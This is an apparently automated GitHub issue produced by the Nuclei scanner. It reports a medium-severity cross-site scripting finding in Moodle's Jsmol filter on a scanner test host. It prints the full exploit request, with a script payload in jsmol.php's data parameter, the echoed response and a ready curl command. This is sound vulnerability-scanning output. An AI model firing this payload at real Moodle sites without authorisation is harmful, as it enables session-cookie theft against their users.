mkrs2404 / tickets

Moodle Jsmol - Cross-Site Scripting (moodle-filter-jmol-xss) found on honey.scanme.sh #59

Closed mkrs2404 closed 2 months ago

mkrs2404 commented 5 months ago

Details: moodle-filter-jmol-xss matched at honey.scanme.sh

Protocol: HTTP

Full URL: https://honey.scanme.sh/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html

Timestamp: Tue Apr 30 19:28:58 +0530 IST 2024

Template Information

| Key | Value |
| --- | --- |
| Name | Moodle Jsmol - Cross-Site Scripting |
| Authors | madrobot |
| Tags | moodle, xss |
| Severity | medium |
| Description | Moodle contains a cross-site scripting vulnerability via the Jsmol plugin and may also be susceptible to local file inclusion or server-side-request forgery. An attacker can execute arbitrary script in the browser of an unsuspecting user and steal cookie-based authentication credentials and launch other attacks. |
| CVSS-Metrics | CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N |
| CWE-ID | CWE-80 |
| CVSS-Score | 5.40 |

Request

GET /filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Edg/90.0.818.56
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 363
Content-Type: text/html
Date: Tue, 30 Apr 2024 13:58:58 GMT

GET /filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=<script>alert('XSS')</script>&mimetype=text/html HTTP/1.1
Host: honey.scanme.sh
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Edg/90.0.818.56

References:

CURL command

curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Edg/90.0.818.56' 'https://honey.scanme.sh/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html'

Generated by Nuclei v3.2.5